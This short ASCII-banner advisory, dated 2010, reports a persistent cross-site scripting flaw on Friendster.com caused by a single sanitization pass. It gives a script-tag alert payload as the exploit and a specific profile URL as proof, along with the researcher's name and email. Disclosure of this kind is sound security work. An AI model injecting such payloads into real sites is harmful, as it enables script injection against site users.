#==================================================================================================# # # # $$$$$$$\ $$\ $$\ $$\ $$$$$$\ # # $$ __$$\ \__| $$ | $$ | $$ __$$\ # # $$ | $$ |$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ / $$ | # # $$$$$$$\ |$$ |$$ _____|$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ | $$$$$$$$ | # # $$ __$$\ $$ |\$$$$$$\ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # # $$ | $$ |$$ | \____$$\ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # # $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | $$ |\$$$$$$ |$$ | $$ | $$ | # # \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # # $$ | # # $$ | Plastics Make It Possible # # \__| # # # #==================================================================================================# # # # Vulnerability............Persistent XSS # # Software.................Friendster.com # # Date.....................5/6/10 # # # #==================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #==================================================================================================# # # # ##Description## # # # # Only one sanitization pass is performed on user submited data. # # # # # # ##Exploit## # # # # <script>alert(0)</script> # # # # # # ##Proof of Concept## # # # # http://profiles.friendster.com/31202727 # # # #==================================================================================================#